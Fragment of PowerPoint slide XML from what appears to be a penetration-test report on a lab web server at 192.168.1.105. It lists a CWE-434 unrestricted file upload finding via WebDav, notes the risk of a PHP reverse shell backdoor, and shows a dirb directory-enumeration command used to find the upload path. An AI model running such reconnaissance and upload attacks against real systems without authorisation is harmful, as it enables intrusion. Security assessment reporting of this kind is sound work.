          <a:off x="460800" y="1050200"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{DE5969DB-620A-4678-A406-667909591162}</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1200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="700">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>     Unrestricted Upload of File with Dangerous Type</a:t>
                      </a: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i="1" lang="en" sz="1200" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CWE ID: 434</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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Those who gain access to the WebDav directory are able to upload files of any type they wish, including malicious PHP script files.</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A malicious payload could potentially be uploaded, then interpreted and executed as code. This could result in an attacker successfully establishing a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>persistent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1100">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> reverse shell backdoor to the web server.</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Directory Browsing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Google Shape;1094;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5" name="Google Shape;1095;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Open a web browser and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> the IP 192.168.1.105/</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DIRB was also able to be used for further recon with the following command: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dirb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.1.105</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> /usr/share/wordlists/dirb/common.txt</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7" name="Google Shape;1097;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1098" name="Google Shape;1098;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9" name="Google Shape;1099;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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1101" name="Google Shape;110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2" name="Google Shape;110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web browser gives access to the directory listing allowing us to browse files.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DIRB allowed us to locate http://192.168.1.105/webdav for future file injection</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1105" name="Google Shape;1105;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1106" name="Google Shape;110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7" name="Google Shape;110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10" name="Google Shape;1110;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6051875" y="1574725"/>
            <a:ext cx="2465025" cy="1487744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5958722" y="3037025"/>
            <a:ext cx="2651342" cy="185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